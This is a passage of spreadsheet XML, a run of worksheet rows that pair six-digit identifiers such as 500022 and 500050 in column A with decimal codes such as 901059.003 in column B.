        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="265" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A265" s="5">
        <v>500022</v>
      </c>
      <c r="B265" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="266" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A266" s="5">
        <v>500022</v>
      </c>
      <c r="B266" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="267" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A267" s="5">
        <v>500022</v>
      </c>
      <c r="B267" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="268" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A268" s="5">
        <v>500022</v>
      </c>
      <c r="B268" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="269" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A269" s="5">
        <v>500022</v>
      </c>
      <c r="B269" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="270" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A270" s="5">
        <v>500022</v>
      </c>
      <c r="B270" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="271" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A271" s="5">
        <v>500022</v>
      </c>
      <c r="B271" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="272" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A272" s="5">
        <v>500022</v>
      </c>
      <c r="B272" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="273" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A273" s="5">
        <v>500022</v>
      </c>
      <c r="B273" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="274" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A274" s="5">
        <v>500022</v>
      </c>
      <c r="B274" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="275" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A275" s="5">
        <v>500022</v>
      </c>
      <c r="B275" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="276" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A276" s="5">
        <v>500022</v>
      </c>
      <c r="B276" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="277" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A277" s="5">
        <v>500022</v>
      </c>
      <c r="B277" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="278" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A278" s="5">
        <v>500022</v>
      </c>
      <c r="B278" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="279" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A279" s="5">
        <v>500022</v>
      </c>
      <c r="B279" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="280" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A280" s="5">
        <v>500022</v>
      </c>
      <c r="B280" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="281" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A281" s="5">
        <v>500022</v>
      </c>
      <c r="B281" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="282" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A282" s="5">
        <v>500022</v>
      </c>
      <c r="B282" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="283" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A283" s="5">
        <v>500022</v>
      </c>
      <c r="B283" s="3">
        <v>901104</v>
      </c>
    </row>
    <row r="284" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A284" s="5">
        <v>500022</v>
      </c>
      <c r="B284" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="285" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A285" s="5">
        <v>500022</v>
      </c>
      <c r="B285" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="286" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A286" s="5">
        <v>500022</v>
      </c>
      <c r="B286" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="287" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A287" s="5">
        <v>500022</v>
      </c>
      <c r="B287" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="288" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A288" s="5">
        <v>500022</v>
      </c>
      <c r="B288" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="289" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A289" s="5">
        <v>500022</v>
      </c>
      <c r="B289" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="290" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A290" s="5">
        <v>500022</v>
      </c>
      <c r="B290" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="291" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A291" s="5">
        <v>500022</v>
      </c>
      <c r="B291" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="292" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A292" s="5">
        <v>500022</v>
      </c>
      <c r="B292" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="293" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A293" s="5">
        <v>500022</v>
      </c>
      <c r="B293" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="294" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A294" s="5">
        <v>500022</v>
      </c>
      <c r="B294" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="295" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A295" s="5">
        <v>500022</v>
      </c>
      <c r="B295" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="296" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A296" s="5">
        <v>500022</v>
      </c>
      <c r="B296" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="297" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A297" s="5">
        <v>500022</v>
      </c>
      <c r="B297" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="298" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A298" s="5">
        <v>500022</v>
      </c>
      <c r="B298" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="299" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A299" s="5">
        <v>500022</v>
      </c>
      <c r="B299" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="300" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A300" s="5">
        <v>500022</v>
      </c>
      <c r="B300" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="301" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A301" s="5">
        <v>500022</v>
      </c>
      <c r="B301" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="302" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A302" s="5">
        <v>500022</v>
      </c>
      <c r="B302" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="303" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A303" s="5">
        <v>500022</v>
      </c>
      <c r="B303" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="304" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A304" s="5">
        <v>500013</v>
      </c>
      <c r="B304" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="305" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A305" s="5">
        <v>500013</v>
      </c>
      <c r="B305" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="306" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A306" s="5">
        <v>500050</v>
      </c>
      <c r="B306" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="307" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A307" s="5">
        <v>500050</v>
      </c>
      <c r="B307" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="308" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A308" s="5">
        <v>500050</v>
      </c>
      <c r="B308" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="309" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A309" s="5">
        <v>500050</v>
      </c>
      <c r="B309" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="310" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A310" s="5">
        <v>500050</v>
      </c>
      <c r="B310" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="311" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A311" s="5">
        <v>500050</v>
      </c>
      <c r="B311" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="312" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A312" s="5">
        <v>500050</v>
      </c>
      <c r="B312" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="313" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A313" s="5">
        <v>500050</v>
      </c>
      <c r="B313" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="314" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A314" s="5">
        <v>500050</v>
      </c>
      <c r="B314" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="315" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A315" s="5">
        <v>500050</v>
      </c>
      <c r="B315" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="316" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A316" s="5">
        <v>500050</v>
      </c>
      <c r="B316" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="317" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A317" s="5">
        <v>500050</v>
      </c>
      <c r="B317" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="318" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A318" s="5">
        <v>500050</v>
      </c>
      <c r="B318" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="319" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A319" s="5">
        <v>500050</v>
      </c>
      <c r="B319" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="320" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A320" s="5">
        <v>500050</v>
      </c>
      <c r="B320" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="321" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A321" s="5">
        <v>500050</v>
      </c>
      <c r="B321" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="322" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A322" s="5">
        <v>500050</v>
      </c>
      <c r="B322" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="323" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A323" s="5">
        <v>500050</v>
      </c>
      <c r="B323" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="324" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A324" s="5">
        <v>500050</v>
      </c>
      <c r="B324" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="325" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A325" s="5">
        <v>500050</v>
      </c>
      <c r="B325" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="326" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A326" s="5">
        <v>500050</v>
      </c>
      <c r="B326" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="327" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A327" s="5">
        <v>500050</v>
      </c>
      <c r="B327" s="3">
        <v>901589</v>
      </c>
    </row>
    <row r="328" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A328" s="5">
        <v>500050</v>
      </c>
      <c r="B328" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="329" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A329" s="5">
        <v>500050</v>
      </c>
      <c r="B329" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="330" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A330" s="5">
        <v>500050</v>
      </c>
      <c r="B330" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="331" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A331" s="5">
        <v>500050</v>
      </c>
      <c r="B331" s="3">
        <v>901564.00399999996</v>
      </c>
    </row>
    <row r="332" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A332" s="5">
        <v>500050</v>
      </c>
      <c r="B332" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="333" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A333" s="5">
        <v>500050</v>
      </c>
      <c r="B333" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="334" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A334" s="5">
        <v>500050</v>
      </c>
      <c r="B334" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="335" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A335" s="5">
        <v>500050</v>
      </c>
      <c r="B335" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="336" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A336" s="5">
        <v>500050</v>
      </c>
      <c r="B336" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="337" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A337" s="5">
        <v>500050</v>
      </c>
      <c r="B337" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="338" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A338" s="5">
        <v>500050</v>
      </c>
      <c r="B338" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="339" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A339" s="5">
        <v>500050</v>
      </c>
      <c r="B339" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="340" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A340" s="5">
        <v>500050</v>
      </c>
      <c r="B340" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="341" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A341" s="5">
        <v>500050</v>
      </c>
      <c r="B341" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="342" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A342" s="5">
        <v>500050</v>
      </c>
      <c r="B342" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="343" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A343" s="5">
        <v>500050</v>
      </c>
      <c r="B343" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="344" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A344" s="5">
        <v>500050</v>
      </c>
      <c r="B344" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="345" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A345" s="5">
        <v>500050</v>
      </c>
      <c r="B345" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="346" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A346" s="5">
        <v>500050</v>
      </c>
      <c r="B346" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="347" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A347" s="5">
        <v>500050</v>
      </c>
      <c r="B347" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="348" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A348" s="5">
        <v>500050</v>
      </c>
      <c r="B348" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="349" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A349" s="5">
        <v>500050</v>
      </c>
      <c r="B349" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="350" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A350" s="5">
        <v>500050</v>
      </c>
      <c r="B350" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="351" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A351" s="5">
        <v>500050</v>
      </c>
      <c r="B351" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="352" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A352" s="5">
        <v>500050</v>
      </c>
      <c r="B352" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="353" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A353" s="5">
        <v>500050</v>
      </c>
      <c r="B353" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="354" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A354" s="5">
        <v>500050</v>
      </c>
      <c r="B354" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="355" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A355" s="5">
        <v>500050</v>
      </c>
      <c r="B355" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="356" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A356" s="5">
        <v>500050</v>
      </c>
      <c r="B356" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="357" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A357" s="5">
        <v>500050</v>
      </c>
      <c r="B357" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="358" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A358" s="5">
        <v>500050</v>
      </c>
      <c r="B358" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="359" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A359" s="5">
        <v>500050</v>
      </c>
      <c r="B359" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="360" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A360" s="5">
        <v>500050</v>
      </c>
      <c r="B360" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="361" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A361" s="5">
        <v>500050</v>
      </c>
      <c r="B361" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="362" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A362" s="5">
        <v>500050</v>
      </c>
      <c r="B362" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="363" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A363" s="5">
        <v>500050</v>
      </c>
      <c r="B363" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="364" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A364" s="5">
        <v>500050</v>
      </c>
      <c r="B364" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="365" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A365" s="5">
        <v>500050</v>
      </c>
      <c r="B365" s="3">
        <v>901216.00100000005</v>
      </c>
    </row>
    <row r="366" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A366" s="5">
        <v>500050</v>
      </c>
      <c r="B366" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="367" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A367" s="5">
        <v>500050</v>
      </c>
      <c r="B367" s="3">
        <v>901608.00100000005</v>
      </c>
    </row>
    <row r="368" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A368" s="5">
        <v>500050</v>
      </c>
      <c r="B368" s="3">
        <v>901608.00399999996</v>
      </c>
    </row>
    <row r="369" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A369" s="5">
        <v>500050</v>
      </c>
      <c r="B369" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="370" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A370" s="5">
        <v>500050</v>
      </c>
      <c r="B370" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="371" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A371" s="5">
        <v>500050</v>
      </c>
      <c r="B371" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="372" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A372" s="5">
        <v>500050</v>
      </c>
      <c r="B372" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="373" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A373" s="5">
        <v>500050</v>
      </c>
      <c r="B373" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="374" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A374" s="5">
        <v>500050</v>
      </c>
      <c r="B374" s="3">
        <v>901552.00199999998</v>
      </c>
    </row>
    <row r="375" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A375" s="5">
        <v>500050</v>
      </c>
      <c r="B375" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="376" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A376" s="5">
        <v>500050</v>
      </c>
      <c r="B376" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="377" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A377" s="5">
        <v>500050</v>
      </c>
      <c r="B377" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="378" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A378" s="5">
        <v>500050</v>
      </c>
      <c r="B378" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="379" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A379" s="5">
        <v>500050</v>
      </c>
      <c r="B379" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="380" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A380" s="5">
        <v>500050</v>
      </c>
      <c r="B380" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="381" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A381" s="5">
        <v>500050</v>
      </c>
      <c r="B381" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="382" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A382" s="5">
        <v>500064</v>
      </c>
      <c r="B382" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="383" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A383" s="5">
        <v>500064</v>
      </c>
      <c r="B383" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="384" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A384" s="5">
        <v>500064</v>
      </c>
      <c r="B384" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="385" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A385" s="5">
        <v>500064</v>
      </c>
      <c r="B385" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="386" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A386" s="5">
        <v>500064</v>
      </c>
      <c r="B386" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="387" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A387" s="5">
        <v>500064</v>
      </c>
      <c r="B387" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="388" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A388" s="5">
        <v>500064</v>
      </c>
      <c r="B388" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="389" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A389" s="5">
        <v>500064</v>
      </c>
      <c r="B389" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="390" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A390" s="5">
        <v>500064</v>
      </c>
      <c r="B390" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="391" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A391" s="5">
        <v>500064</v>
      </c>
      <c r="B391" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="392" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A392" s="5">
        <v>500064</v>
      </c>
      <c r="B392" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="393" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A393" s="5">
        <v>500064</v>
      </c>
      <c r="B393" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="394" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A394" s="5">
        <v>500064</v>
      </c>
      <c r="B394" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="395" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A395" s="5">
        <v>500064</v>
      </c>
      <c r="B395" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="396" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A396" s="5">
        <v>500064</v>
      </c>
      <c r="B396" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="397" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A397" s="5">
        <v>500064</v>
      </c>
      <c r="B397" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="398" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A398" s="5">
        <v>500064</v>
      </c>
      <c r="B398" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="399" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A399" s="5">
        <v>500064</v>
      </c>
      <c r="B399" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="400" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A400" s="5">
        <v>500064</v>
      </c>
      <c r="B400" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="401" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A401" s="5">
        <v>500064</v>
      </c>
      <c r="B401" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="402" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A402" s="5">
        <v>500064</v>
      </c>
      <c r="B402" s="3">
        <v>901003.005</v>
      </c>
    </row>
    <row r="403" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A403" s="5">
        <v>500064</v>
      </c>
      <c r="B403" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="404" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A404" s="5">
        <v>500064</v>
      </c>
      <c r="B404" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="405" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A405" s="5">
        <v>500064</v>
      </c>
      <c r="B405" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="406" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A406" s="5">
        <v>500064</v>
      </c>
      <c r="B406" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="407" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A407" s="5">
        <v>500064</v>
      </c>
      <c r="B407" s="3">
        <v>901552.00600000005</v>
      </c>
    </row>
    <row r="408" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A408" s="5">
        <v>500064</v>
      </c>
      <c r="B408" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="409" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A409" s="5">
        <v>500064</v>
      </c>
      <c r="B409" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="410" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A410" s="5">
        <v>500064</v>
      </c>
      <c r="B410" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="411" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A411" s="5">
        <v>500064</v>
      </c>
      <c r="B411" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="412" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A412" s="5">
        <v>500067</v>
      </c>
      <c r="B412" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="413" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A413" s="5">
        <v>500067</v>
      </c>
      <c r="B413" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="414" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A414" s="5">
        <v>500067</v>
      </c>
      <c r="B414" s="3">
        <v>901123</v>
      </c>
    </row>
    <row r="415" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A415" s="5">
        <v>500067</v>
      </c>
      <c r="B415" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="416" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A416" s="5">
        <v>500067</v>
      </c>
      <c r="B416" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="417" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A417" s="5">
        <v>500067</v>
      </c>
      <c r="B417" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="418" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A418" s="5">
        <v>500067</v>
      </c>
      <c r="B418" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="419" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A419" s="5">
        <v>500067</v>
      </c>
      <c r="B419" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="420" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A420" s="5">
        <v>500067</v>
      </c>
      <c r="B420" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="421" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A421" s="5">
        <v>500067</v>
      </c>
      <c r="B421" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="422" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A422" s="5">
        <v>500067</v>
      </c>
      <c r="B422" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="423" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A423" s="5">
        <v>500067</v>
      </c>
      <c r="B423" s="3">
        <v>901189</v>
      </c>
    </row>
